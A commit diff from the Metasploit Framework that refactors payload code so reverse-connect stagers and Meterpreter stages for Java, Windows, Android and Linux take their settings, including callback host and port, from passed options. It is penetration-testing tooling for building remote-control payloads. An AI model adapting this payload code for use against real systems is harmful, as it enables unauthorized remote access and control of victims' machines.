More rework of payload structure to handle multi arch handlers

Author: OJ

lib/msf/core/payload/java/reverse_tcp.rb

@@ -0,0 +1,76 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/transport_config'
+require 'msf/core/payload/uuid/options'
+
+module Msf
+
+###
+#
+# Complex payload generation for Java that speaks TCP
+#
+###
+
+module Payload::Java::ReverseTcp
+
+  include Msf::Payload::TransportConfig
+  include Msf::Payload::Java
+  include Msf::Payload::UUID::Options
+
+  #
+  # Register Java reverse_http specific options
+  #
+  def initialize(*args)
+    super
+    register_advanced_options([
+      Msf::OptString.new('AESPassword', [false, "Password for encrypting communication", '']),
+      Msf::OptInt.new('Spawn', [true, "Number of subprocesses to spawn", 2])
+    ])
+  end
+
+  #
+  # Generate the transport-specific configuration
+  #
+  def transport_config(opts={})
+    transport_config_reverse_tcp(opts)
+  end
+
+  def include_send_uuid
+      false
+  end
+
+  #
+  # Generate configuration that is to be included in the stager.
+  #
+  def stager_config(opts={})
+    ds = opts[:datastore] || datastore
+    spawn = ds["Spawn"] || 2
+    c =  ""
+    c << "Spawn=#{spawn}\n"
+    pass = ds["AESPassword"] || ''
+    if pass != ""
+      c << "AESPassword=#{pass}\n"
+    end
+    c << "LHOST=#{ds["LHOST"]}\n" if ds["LHOST"]
+    c << "LPORT=#{ds["LPORT"]}\n" if ds["LPORT"]
+
+    c
+  end
+
+  def class_files
+    # TODO: we should handle opts in class_files as well
+    if datastore['AESPassword'] && datastore['AESPassword'].length > 0
+      [
+        ["metasploit", "AESEncryption.class"],
+      ]
+    else
+      []
+    end
+  end
+
+end
+
+end
+
+

lib/msf/core/payload/windows/meterpreter_loader.rb

@@ -2,6 +2,7 @@
 
 require 'msf/core'
 require 'msf/core/reflective_dll_loader'
+require 'rex/payloads/meterpreter/config'
 
 module Msf
 
@@ -66,6 +67,31 @@ def asm_invoke_metsrv(opts={})
     ^
   end
 
+  def stage_payload(opts={})
+    stage_meterpreter(opts) + generate_config(opts)
+  end
+
+  def generate_config(opts={})
+    ds = opts[:datastore] || datastore
+    opts[:uuid] ||= generate_payload_uuid
+
+    # create the configuration block, which for staged connections is really simple.
+    config_opts = {
+      arch:       opts[:uuid].arch,
+      exitfunk:   ds['EXITFUNC'],
+      expiration: ds['SessionExpirationTimeout'].to_i,
+      uuid:       opts[:uuid],
+      transports: opts[:transport_config] || [transport_config(opts)],
+      extensions: []
+    }
+
+    # create the configuration instance based off the parameters
+    config = Rex::Payloads::Meterpreter::Config.new(config_opts)
+
+    # return the binary version of it
+    config.to_b
+  end
+
   def stage_meterpreter(opts={})
     # Exceptions will be thrown by the mixin if there are issues.
     dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll'))

lib/msf/core/payload/windows/reverse_tcp.rb

@@ -25,17 +25,18 @@ module Payload::Windows::ReverseTcp
   #
   # Generate the first stage
   #
-  def generate
+  def generate(opts={})
+    ds = opts[:datastore] || datastore
     conf = {
-      port:        datastore['LPORT'],
-      host:        datastore['LHOST'],
-      retry_count: datastore['ReverseConnectRetries'],
+      port:        ds['LPORT'],
+      host:        ds['LHOST'],
+      retry_count: ds['ReverseConnectRetries'],
       reliable:    false
     }
 
     # Generate the advanced stager if we have space
     if self.available_space && required_space <= self.available_space
-      conf[:exitfunk] = datastore['EXITFUNC']
+      conf[:exitfunk] = ds['EXITFUNC']
       conf[:reliable] = true
     end
 

lib/msf/core/payload/windows/x64/meterpreter_loader.rb

@@ -2,10 +2,10 @@
 
 require 'msf/core'
 require 'msf/core/reflective_dll_loader'
+require 'rex/payloads/meterpreter/config'
 
 module Msf
 
-
 ###
 #
 # Common module stub for ARCH_X64 payloads that make use of Meterpreter.
@@ -69,6 +69,31 @@ def asm_invoke_metsrv(opts={})
     ^
   end
 
+  def stage_payload(opts={})
+    stage_meterpreter(opts) + generate_config(opts)
+  end
+
+  def generate_config(opts={})
+    ds = opts[:datastore] || datastore
+    opts[:uuid] ||= generate_payload_uuid
+
+    # create the configuration block, which for staged connections is really simple.
+    config_opts = {
+      arch:       opts[:uuid].arch,
+      exitfunk:   ds['EXITFUNC'],
+      expiration: ds['SessionExpirationTimeout'].to_i,
+      uuid:       opts[:uuid],
+      transports: opts[:transport_config] || [transport_config(opts)],
+      extensions: []
+    }
+
+    # create the configuration instance based off the parameters
+    config = Rex::Payloads::Meterpreter::Config.new(config_opts)
+
+    # return the binary version of it
+    config.to_b
+  end
+
   def stage_meterpreter(opts={})
     # Exceptions will be thrown by the mixin if there are issues.
     dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll'))

modules/payloads/stagers/java/reverse_http.rb

@@ -26,6 +26,6 @@ def initialize(info={})
       'Handler'     => Msf::Handler::ReverseHttp,
       'Convention'  => 'javaurl',
       'Stager'      => {'Payload' => ''}
-      ))
+    ))
   end
 end

modules/payloads/stagers/java/reverse_tcp.rb

@@ -5,63 +5,27 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
-require 'msf/base/sessions/command_shell'
-require 'msf/base/sessions/command_shell_options'
+require 'msf/core/payload/java/reverse_tcp'
 
 module MetasploitModule
 
   CachedSize = 5118
 
   include Msf::Payload::Stager
   include Msf::Payload::Java
+  include Msf::Payload::Java::ReverseTcp
 
   def initialize(info = {})
     super(merge_info(info,
       'Name'          => 'Java Reverse TCP Stager',
       'Description'   => 'Connect back stager',
-      'Author'        => [
-          'mihi',  # all the hard work
-          'egypt', # msf integration
-        ],
+      'Author'        => ['mihi', 'egypt'],
       'License'       => MSF_LICENSE,
       'Platform'      => 'java',
       'Arch'          => ARCH_JAVA,
       'Handler'       => Msf::Handler::ReverseTcp,
       'Convention'    => 'javasocket',
-      'Stager'        => {'Payload' => ""}
+      'Stager'        => {'Payload' => ''}
       ))
-
-    register_advanced_options(
-      [
-        Msf::OptString.new('AESPassword', [ false, "Password for encrypting communication", '' ]),
-        Msf::OptInt.new('Spawn', [ true, "Number of subprocesses to spawn", 2 ])
-      ], self.class
-    )
-
-    @class_files = [ ]
-  end
-
-  def include_send_uuid
-      false
   end
-
-  def config
-    spawn = datastore["Spawn"] || 2
-    c =  ""
-    c << "Spawn=#{spawn}\n"
-    pass = datastore["AESPassword"] || ""
-    if pass != ""
-      c << "AESPassword=#{pass}\n"
-      @class_files = [
-        [ "metasploit", "AESEncryption.class" ],
-      ]
-    else
-      @class_files = [ ]
-    end
-    c << "LHOST=#{datastore["LHOST"]}\n" if datastore["LHOST"]
-    c << "LPORT=#{datastore["LPORT"]}\n" if datastore["LPORT"]
-
-    c
-  end
-
 end

modules/payloads/stagers/windows/reverse_http.rb

@@ -26,5 +26,4 @@ def initialize(info = {})
       'Handler'     => Msf::Handler::ReverseHttp,
       'Convention'  => 'sockedi http'))
   end
-
 end

modules/payloads/stagers/windows/reverse_tcp.rb

@@ -25,8 +25,7 @@ def initialize(info = {})
       'Arch'        => ARCH_X86,
       'Handler'     => Msf::Handler::ReverseTcp,
       'Convention'  => 'sockedi',
-      'Stager'      => { 'RequiresMidstager' => false }
+      'Stager'      => {'RequiresMidstager' => false}
     ))
   end
-
 end

modules/payloads/stages/android/meterpreter.rb

@@ -52,14 +52,15 @@ def generate_stage(opts={})
 
   def generate_config(opts={})
     opts[:uuid] ||= generate_payload_uuid
+    ds = opts[:datastore] || datastore
 
     # create the configuration block, which for staged connections is really simple.
     config_opts = {
       ascii_str:  true,
       arch:       opts[:uuid].arch,
-      expiration: datastore['SessionExpirationTimeout'].to_i,
+      expiration: ds['SessionExpirationTimeout'].to_i,
       uuid:       opts[:uuid],
-      transports: [transport_config(opts)]
+      transports: opts[:transport_config] || [transport_config(opts)]
     }
 
     # create the configuration instance based off the parameters

modules/payloads/stages/linux/x86/meterpreter.rb

@@ -154,16 +154,17 @@ def generate_meterpreter
 
   def generate_config(opts={})
     opts[:uuid] ||= generate_payload_uuid
+    ds = opts[:datastore] || datastore
 
     # create the configuration block, which for staged connections is really simple.
     config_opts = {
-      :arch       => opts[:uuid].arch,
-      :exitfunk   => nil,
-      :expiration => datastore['SessionExpirationTimeout'].to_i,
-      :uuid       => opts[:uuid],
-      :transports => [transport_config(opts)],
-      :extensions => [],
-      :ascii_str  => true
+      arch:       opts[:uuid].arch,
+      exitfunk:   nil,
+      expiration: ds['SessionExpirationTimeout'].to_i,
+      uuid:       opts[:uuid],
+      transports: opts[:transport_config] || [transport_config(opts)],
+      extensions: [],
+      ascii_str:  true
     }
 
     # create the configuration instance based off the parameters